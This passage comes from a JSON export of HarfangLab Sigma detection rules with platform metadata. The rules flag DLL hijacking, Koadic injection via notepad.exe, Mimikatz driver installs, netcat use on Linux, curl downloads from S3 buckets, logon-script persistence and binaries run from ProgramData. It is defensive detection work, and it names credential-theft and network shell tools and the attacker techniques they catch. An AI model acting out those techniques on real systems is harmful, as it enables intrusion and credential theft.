"rule_description": "Detects potential Windows DLL Hijacking via tabcal.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b44d2c13-759d-4eac-a3b2-08f79d059047",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091356Z",
"creation_date": "2026-03-23T11:45:34.091358Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091363Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gentilkiwi/mimikatz/wiki",
"https://github.com/offsecginger/koadic/blob/main/data/bin/mimishim/ReflectiveDLLInjection/dll/src/ReflectiveDll.c#L58",
"https://github.com/offsecginger/koadic/blob/main/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_process.c#L41",
"https://github.com/offsecginger/koadic/blob/main/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_process.c#L20",
"https://attack.mitre.org/techniques/T1055/004/",
"https://attack.mitre.org/techniques/T1055/012/",
"https://attack.mitre.org/software/S0250/"
],
"name": "t1055_koadic_notepad_injection.yml",
"content": "title: Suspicious Invocation of notepad.exe linked to Koadic Process Injection\nid: b44d2c13-759d-4eac-a3b2-08f79d059047\ndescription: |\n Detects the usage of Koadic, a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\n Koadic uses notepad.exe to inject a DLL and execute mimikatz on the host machine.\n This rule may be triggered by other frameworks or malwares than Koadic.\n It is recommended to investigate the context of this action to determine the legitimacy of the Notepad execution.\nreferences:\n - https://github.com/gentilkiwi/mimikatz/wiki\n - https://github.com/offsecginger/koadic/blob/main/data/bin/mimishim/ReflectiveDLLInjection/dll/src/ReflectiveDll.c#L58\n - https://github.com/offsecginger/koadic/blob/main/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_process.c#L41\n - https://github.com/offsecginger/koadic/blob/main/data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_process.c#L20\n - https://attack.mitre.org/techniques/T1055/004/\n - https://attack.mitre.org/techniques/T1055/012/\n - https://attack.mitre.org/software/S0250/\ndate: 2021/02/16\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.004\n - attack.t1055.012\n - attack.s0250\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Koadic\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\sysnative\\notepad.exe'\n - OriginalFileName: 'NOTEPAD.EXE'\n selection_2:\n ParentImage|endswith: '\\rundll32.exe'\n\n # If notepad.exe was started with a path in its command line, it's probably a false positive.\n exclusion_fp:\n CommandLine: '*notepad*\\\\*'\n\n exclusion_known_fp_parent:\n ParentCommandLine|contains:\n - 'shell32.dll,OpenAs_RunDLL'\n - 'shell32.dll,RunAsNewUser_RunDLL'\n - 'shell32.dll,SHCreateLocalServerRunDll'\n - 'url.dll,FileProtocolHandler'\n - 'printui.dll,PrintUIEntryDPIAware'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b44d2c13-759d-4eac-a3b2-08f79d059047",
"rule_name": "Suspicious Invocation of notepad.exe linked to Koadic Process Injection",
"rule_description": "Detects the usage of Koadic, a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\nKoadic uses notepad.exe to inject a DLL and execute mimikatz on the host machine.\nThis rule may be triggered by other frameworks or malwares than Koadic.\nIt is recommended to investigate the context of this action to determine the legitimacy of the Notepad execution.\n",
"rule_creation_date": "2021-02-16",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.004",
"attack.t1055.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b462248e-6e88-400f-af8b-767f81572f57",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083364Z",
"creation_date": "2026-03-23T11:45:34.083367Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083371Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/angryip/ipscan/",
"https://unit42.paloaltonetworks.com/muddled-libra/",
"https://www.safebreach.com/blog/phobos-ransomware-ivanti-connect-secure-cert-alert-aa24-060a_060b/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_angry_ip_scanner_executed.yml",
"content": "title: Angry IP Scanner Executed\nid: b462248e-6e88-400f-af8b-767f81572f57\ndescription: |\n Detects the execution of Angry IP scanner.\n Angry IP Scanner is a Java-based IP scanner known for being used by threat actors like Muddled Libra.\n It is recommended to analyze the execution context of this binary and any other alerts to determine its legitimacy.\nreferences:\n - https://github.com/angryip/ipscan/\n - https://unit42.paloaltonetworks.com/muddled-libra/\n - https://www.safebreach.com/blog/phobos-ransomware-ivanti-connect-secure-cert-alert-aa24-060a_060b/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2025/04/02\nmodified: 2025/04/02\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - attack.t1046\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.AngryIPScanner\n - classification.Windows.Behavior.NetworkScan\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessOriginalFileName: 'ipscan.exe'\n ProcessDescription:\n - 'Angry IP scanner'\n - 'Angry IP Scanner - fast and friendly network scanner'\n\n # Legitimate installation\n filter_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b462248e-6e88-400f-af8b-767f81572f57",
"rule_name": "Angry IP Scanner Executed",
"rule_description": "Detects the execution of Angry IP scanner.\nAngry IP Scanner is a Java-based IP scanner known for being used by threat actors like Muddled Libra.\nIt is recommended to analyze the execution context of this binary and any other alerts to determine its legitimacy.\n",
"rule_creation_date": "2025-04-02",
"rule_modified_date": "2025-04-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1046"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b49b7d13-3131-4107-aa45-a4af1207096b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071607Z",
"creation_date": "2026-03-23T11:45:34.071609Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071613Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1037/001/"
],
"name": "t1037_001_persistence_registry_environ_userinitmprlogonscript.yml",
"content": "title: UserInitMprLogonScript Environment Variable Set via Registry\nid: b49b7d13-3131-4107-aa45-a4af1207096b\ndescription: |\n Detects a modification of the UserInitMprLogonScript environment variable in registry.\n This value of this variable is a path to a script that will be run at every logon.\n Attackers can register a malicious script to establish persistence on an infected host.\n It is recommended to investigate the path in the value set in the registry to determine its legitimacy, as well as the process responsible for this registry modification.\nreferences:\n - https://attack.mitre.org/techniques/T1037/001/\ndate: 2020/09/25\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1037.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\Environment\\UserInitMprLogonScript'\n\n filter_empty:\n Details: '(Empty)'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b49b7d13-3131-4107-aa45-a4af1207096b",
"rule_name": "UserInitMprLogonScript Environment Variable Set via Registry",
"rule_description": "Detects a modification of the UserInitMprLogonScript environment variable in registry.\nThis value of this variable is a path to a script that will be run at every logon.\nAttackers can register a malicious script to establish persistence on an infected host.\nIt is recommended to investigate the path in the value set in the registry to determine its legitimacy, as well as the process responsible for this registry modification.\n",
"rule_creation_date": "2020-09-25",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1037.001",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b4d8fde4-7113-455b-9cf6-22c00f2d8384",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607181Z",
"creation_date": "2026-03-23T11:45:34.607184Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607192Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/mimidrv-in-depth-4d273d19e148",
"https://attack.mitre.org/techniques/T1569/002",
"https://attack.mitre.org/software/S0002/"
],
"name": "t1569_002_mimikatz_service_installed.yml",
"content": "title: Mimikatz Service Installed\nid: b4d8fde4-7113-455b-9cf6-22c00f2d8384\ndescription: |\n Detects the installation of the mimikatz service.\n Mimikatz is a popular offensive security tool used for credential acquisition and lateral movement on an Active Directory endpoint.\n It is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\nreferences:\n - https://posts.specterops.io/mimidrv-in-depth-4d273d19e148\n - https://attack.mitre.org/techniques/T1569/002\n - https://attack.mitre.org/software/S0002/\ndate: 2021/05/06\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - attack.s0002\n - classification.Windows.Source.EventLog\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n service: system\ndetection:\n selection_event_id:\n EventID: 7045\n\n selection_service_name:\n - ServiceName|contains: 'mimikatz driver' # mimikatz driver (mimidrv)\n - ServiceFileName|contains: 'mimidrv.sys'\n\n condition: all of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b4d8fde4-7113-455b-9cf6-22c00f2d8384",
"rule_name": "Mimikatz Service Installed",
"rule_description": "Detects the installation of the mimikatz service.\nMimikatz is a popular offensive security tool used for credential acquisition and lateral movement on an Active Directory endpoint.\nIt is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\n",
"rule_creation_date": "2021-05-06",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1136.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b5111369-ac70-4bc7-8b08-2b742d2226a8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296470Z",
"creation_date": "2026-03-23T11:45:35.296472Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296476Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/threat-intelligence/clipping-silver-sparrows-wings/",
"https://attack.mitre.org/techniques/T1102/"
],
"name": "t1102_curl_aws_bucket.yml",
"content": "title: Data Retrieved from AWS Bucket via curl\nid: b5111369-ac70-4bc7-8b08-2b742d2226a8\ndescription: |\n Detects a curl command-line containing an AWS bucket URL.\n Adversaries can use AWS buckets to store payloads, as traffic to AWS instances is usually allowed and common in corporate environments.\n It is recommended to investigate files that were downloaded, and to analyze the process that executed the curl command to determine whether this action was legitimate.\nreferences:\n - https://redcanary.com/blog/threat-intelligence/clipping-silver-sparrows-wings/\n - https://attack.mitre.org/techniques/T1102/\ndate: 2024/06/12\nmodified: 2026/02/19\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102\n - attack.t1105\n - attack.t1071.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.FileDownload\n - classification.macOS.Behavior.CommandAndControl\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/curl'\n CommandLine|contains: 's3.amazonaws.com'\n\n exclusion_ancestors:\n Ancestors|contains: '|/Applications/Unity Hub.app/Contents/MacOS/Unity Hub|'\n\n exclusion_homebrew:\n ParentCommandLine|startswith: '/opt/homebrew/Library/Homebrew/vendor/portable-ruby/current/bin/ruby -W1 --disable=gems,rubyopt /opt/homebrew/Library/Homebrew/brew.rb '\n\n exclusion_pod:\n ParentCommandLine|endswith:\n - '/bin/pod update'\n - '/bin/pod install'\n\n exclusion_jamf:\n ProcessAncestors|contains: '|/usr/local/jamf/bin/jamf'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b5111369-ac70-4bc7-8b08-2b742d2226a8",
"rule_name": "Data Retrieved from AWS Bucket via curl",
"rule_description": "Detects a curl command-line containing an AWS bucket URL.\nAdversaries can use AWS buckets to store payloads, as traffic to AWS instances is usually allowed and common in corporate environments.\nIt is recommended to investigate files that were downloaded, and to analyze the process that executed the curl command to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-06-12",
"rule_modified_date": "2026-02-19",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b54e5056-40b9-4eea-aab9-6dc111b8afb2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624489Z",
"creation_date": "2026-03-23T11:45:34.624491Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624495Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SecurityAura/status/1737092798728278498",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_execution_from_programdata.yml",
"content": "title: Binary Executed from ProgramData Folder\nid: b54e5056-40b9-4eea-aab9-6dc111b8afb2\ndescription: |\n Detects a suspicious execution from the root of the ProgramData folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to analyze the executed binary and look malicious content or behavior.\nreferences:\n - https://twitter.com/SecurityAura/status/1737092798728278498\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/01/26\nmodified: 2025/12/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\ProgramData\\'\n\n filter_programdata:\n Image: '?:\\ProgramData\\\\*\\\\*'\n\n exclusion_uninstall:\n CommandLine:\n - '?:\\ProgramData\\\\*_Uninstall.exe */NO_UNINSTALL_FEEDBACK=true _\\?=?:\\Program Files\\\\*\\bin'\n - '?:\\ProgramData\\\\*_Uninstall.exe */NO_UNINSTALL_FEEDBACK=true _\\?=?:\\Program Files (x86)\\\\*\\bin'\n ParentCommandLine:\n - '?:\\Users\\\\*\\Downloads\\\\* /UAC:* /NCRC'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\* /UAC:* /NCRC'\n\n exclusion_forensit:\n OriginalFileName: 'UserProfileMigrationService.exe'\n Description: 'ForensiT User Profile Migration Service'\n Company:\n - 'ForensiT Software Limited'\n - 'ForensiT Limited'\n\n exclusion_tsplus:\n Image:\n - '?:\\ProgramData\\alternateshell.exe'\n - '?:\\ProgramData\\svcr.exe'\n - '?:\\ProgramData\\logonsession.exe'\n Signed: 'true'\n Signature:\n - 'JWTS'\n - 'JWTS SASU'\n - 'Remote Access World SAS'\n - 'TSplus SAS'\n\n exclusion_vmsuite:\n # C:\\Program Files\\Thermo Scientific\\VisionMate Suite\\VMSuite.exe\n Image: '?:\\ProgramData\\DPMon32_v2.exe'\n Signed: 'true'\n Signature: 'Microcosm Ltd'\n\n exclusion_varian:\n # C:\\ProgramData\\VDT.exe\n OriginalFileName: 'VarianDeploymentTool.exe'\n Description: 'Varian Deployment Tool'\n Company: 'Varian Medical Systems, Inc.'\n\n exclusion_bluestack:\n Image: '?:\\ProgramData\\BlueStacksServicesSetup.exe'\n Signed: 'true'\n Signature: 'Now.gg, INC'\n\n exclusion_intellijidea:\n Image: '?:\\ProgramData\\IntelliJIdea????.?_???.*.??_Uninstall.exe'\n ParentImage|endswith: '\\ideaIU-????.?.?.exe'\n\n exclusion_dpmon:\n ProcessName: 'DPmon64_v3.exe'\n Signed: 'true'\n # company doing security software\n Signature: 'Microcosm Ltd'\n\n exclusion_abcdeploy:\n - ProcessImage: '?:\\ProgramData\\Win-update.exe'\n Signed: 'true'\n Signature: 'ABC-Deploy'\n - ProcessImage: '?:\\ProgramData\\Win-update.exe'\n ProcessProduct: 'ABC-Deploy'\n ProcessOriginalFileName: 'ABC-Update.exe'\n\n exclusion_beyondtrust:\n - ProcessImage: '?:\\ProgramData\\btsccoi-????????????????????????????????.exe'\n Signed: 'true'\n Signature: 'BeyondTrust Corporation'\n - ProcessImage: '?:\\ProgramData\\btsccoi-????????????????????????????????.exe'\n Ancestors|contains: '\\AppData\\Local\\BeyondTrust\\sra-scc\\\\*\\sra-scc.exe|'\n\n exclusion_faronics:\n ProcessImage: '?:\\ProgramData\\FWAInstallMonitor.exe'\n Signed: 'true'\n Signature: 'Faronics Corporation'\n\n exclusion_jetbrains:\n - ProcessImage: '?:\\ProgramData\\PyCharm*_Uninstall.exe'\n Signed: 'true'\n Signature: 'JetBrains s.r.o.'\n - ProcessImage:\n - '?:\\ProgramData\\PyCharm*_Uninstall.exe'\n - '?:\\ProgramData\\IntelliJIdea*_Uninstall.exe'\n - '?:\\ProgramData\\Rider*_Uninstall.exe'\n ProcessCommandLine:\n - '?:\\ProgramData\\PyCharm*_Uninstall.exe /NO_UNINSTALL_FEEDBACK=true _?=?:\\Program Files\\JetBrains\\PyCharm *\\bin'\n - '?:\\ProgramData\\IntelliJIdea*_Uninstall.exe /NO_UNINSTALL_FEEDBACK=true _?=?:\\\\*\\IntelliJ IDEA *\\bin'\n - '?:\\ProgramData\\Rider*_Uninstall.exe /NO_UNINSTALL_FEEDBACK=true _?=?:\\\\*\\JetBrains Rider *\\bin'\n\n exclusion_microcosm:\n ProcessImage: '?:\\ProgramData\\DPMon32_v?.exe'\n ProcessParentImage: '?:\\Program Files\\Thermo Scientific\\VisionMate Suite\\VMSuite.exe'\n\n # Behringer X-USB\n exclusion_behringer:\n ProcessImage:\n - '?:\\ProgramData\\CNE???.tmp'\n - '?:\\ProgramData\\CNE????.tmp'\n ProcessCommandLine: '?:\\ProgramData\\CNE*.tmp openh ??:\\Program Files\\BEHRINGER\\X-*_Audio_Driver\\W10_x64\\X*AudioCplApp.exe? -hide'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b54e5056-40b9-4eea-aab9-6dc111b8afb2",
"rule_name": "Binary Executed from ProgramData Folder",
"rule_description": "Detects a suspicious execution from the root of the ProgramData folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to analyze the executed binary and look malicious content or behavior.\n",
"rule_creation_date": "2024-01-26",
"rule_modified_date": "2025-12-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b594e09f-86e5-4b70-a942-e1e2bb362f05",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294386Z",
"creation_date": "2026-03-23T11:45:35.294390Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294395Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1046/",
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/techniques/T1095/",
"https://attack.mitre.org/techniques/T1021/"
],
"name": "t1049_netcat_linux.yml",
"content": "title: Netcat Execution (Linux)\nid: b594e09f-86e5-4b70-a942-e1e2bb362f05\ndescription: |\n Detects the execution of Netcat, a networking utility that reads and writes data across network connections.\n Netcat can be used by attackers to perform malicious activities such as reconnaissance, lateral movement, reverse shell, etc.\n It is recommended to analyze the process responsible for the execution of netcat as well as the to analyze the command-line arguments to determine whether its usage is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1046/\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/techniques/T1095/\n - https://attack.mitre.org/techniques/T1021/\ndate: 2023/01/03\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1046\n - attack.t1049\n - attack.command_and_control\n - attack.t1095\n - attack.lateral_movement\n - attack.t1021\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.Lateralization\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/netcat'\n - '/ncat'\n - '/nc'\n - '/nc.openbsd'\n - '/nc.traditional'\n ParentImage|contains: '?'\n\n exclusion_help:\n CommandLine|endswith:\n - ' -h'\n - ' -help'\n - ' --help'\n\n exclusion_localhost:\n CommandLine|contains:\n - ' localhost '\n - ' 127.0.0.1 '\n\n exclusion_commandline:\n ParentCommandLine: '/usr/bin/bash -c FC=$FMX; while true; do /usr/bin/nc -z * && FC=-1 ; ((FC++)) ; [ $FC -ge $FMX ] && exit 2 ; sleep $SLEEP ; done & '\n\n exclusion_zimbra:\n ParentCommandLine:\n - '/bin/bash /opt/zimbra/bin/zmconfigdct *'\n - '/bin/bash /opt/zimbra/bin/zmconfigdctl *'\n\n exclusion_apigee:\n # Grand parent can be missing\n # GrandparentCommandLine: '/bin/bash /opt/apigee/apigee-service*/bin/apigee-service *'\n ParentCommandLine: 'timeout 1 nc -w0 -u localhost 8090'\n\n exclusion_containerd:\n - ParentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/local/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/local/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/podman|'\n\n exclusion_dockerselenium:\n ParentCommandLine:\n - 'bash /usr/bin/wait-vnc.sh'\n - '/usr/bin/env bash /usr/bin/wait-vnc.sh'\n\n exclusion_tor:\n ParentCommandLine|contains: '; echo signal newnym; echo quit) | nc'\n\n # https://labs.maarch.org/maarch/MaarchCourrier\n # src/app/contentManagement/controllers/DocumentEditorController.php\n exclusion_maarch:\n ParentCommandLine: 'sh -c nc -vz -w 5 * 2>&1'\n CommandLine: 'nc -vz -w 5 *'\n\n # https://gallery.munin-monitoring.org/plugins/munin/squeezebox_/\n exclusion_squeezebox:\n - ParentCommandLine: '/bin/bash /etc/munin/plugins/squeezebox_*'\n - GrandparentCommandLine:\n - '/usr/sbin/munin-node [127.0.0.1]'\n - '/usr/sbin/munin-node [::ffff:127.0.0.1]'\n\n exclusion_munin:\n ParentCommandLine: '/usr/bin/perl -wT /usr/sbin/munin-node'\n\n exclusion_consul:\n ParentImage: '/usr/bin/consul'\n\n exclusion_stibo:\n ParentImage: '/opt/stibo/step/resources/jdk/*/bin/java'\n\n exclusion_nxagentd:\n - Image: '/usr/bin/nxagentd'\n 